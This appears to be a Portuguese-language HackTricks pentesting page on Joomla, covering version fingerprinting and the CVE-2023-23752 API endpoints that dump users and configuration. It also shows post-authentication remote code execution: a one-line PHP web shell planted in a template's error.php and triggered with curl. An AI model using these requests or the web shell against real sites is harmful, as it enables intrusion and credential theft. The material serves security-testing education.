Joomla
Last updated
Last updated
Aprenda e pratique AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Aprenda e pratique GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprofunde sua experiência em Mobile Security com a 8kSec Academy. Domine a segurança de iOS e Android através de nossos cursos autônomos e obtenha certificação:
O Joomla coleta algumas estatísticas de uso anônimas, como a distribuição das versões do Joomla, PHP e sistemas de banco de dados e sistemas operacionais de servidor em uso nas instalações do Joomla. Esses dados podem ser consultados através de sua API pública.
Verifique o meta
robots.txt
README.txt
Em /administrator/manifests/files/joomla.xml você pode ver a versão.
Em /language/en-GB/en-GB.xml você pode obter a versão do Joomla.
Em plugins/system/cache/cache.xml você pode ver uma versão aproximada.
Em 80,443 - A metodologia de pentesting web é uma seção sobre scanners de CMS que podem escanear Joomla.
Versões de 4.0.0 a 4.2.7 são vulneráveis à divulgação de informações não autenticadas (CVE-2023-23752) que irá despejar credenciais e outras informações.
Usuários: http://<host>/api/v1/users?public=true
Arquivo de Configuração: http://<host>/api/index.php/v1/config/application?public=true
Módulo MSF: scanner/http/joomla_api_improper_access_checks
ou script ruby: 51334
Você pode usar este script para tentar realizar um ataque de força bruta no login.
Se você conseguiu obter credenciais de admin, você pode RCE dentro dele adicionando um trecho de código PHP para ganhar RCE. Podemos fazer isso personalizando um template.
Clique em Templates
no canto inferior esquerdo sob Configuration
para abrir o menu de templates.
Clique em um nome de template. Vamos escolher protostar
sob o cabeçalho da coluna Template
. Isso nos levará à página Templates: Customise
.
Finalmente, você pode clicar em uma página para abrir o código-fonte da página. Vamos escolher a página error.php
. Vamos adicionar um PHP one-liner para ganhar execução de código da seguinte forma:
system($_GET['cmd']);
Salvar & Fechar
curl -s http://joomla-site.local/templates/protostar/error.php?cmd=id
JoomSploit: Script de Exploração Joomla que eleva XSS a RCE ou Outras Vulnerabilidades Críticas. Para mais informações, confira este post. Ele fornece suporte para as Versões Joomla 5.X.X, 4.X.X e 3.X.X, e permite:
Escalação de Privilégios: Cria um usuário no Joomla.
(RCE) Edição de Templates Integrados: Edita Templates Integrados no Joomla.
(Custom) Exploits Personalizados: Exploits Personalizados para Plugins de Terceiros do Joomla.
Aprofunde sua experiência em Segurança Móvel com a 8kSec Academy. Domine a segurança de iOS e Android através de nossos cursos autônomos e obtenha certificação:
Aprenda e pratique Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Aprenda e pratique Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)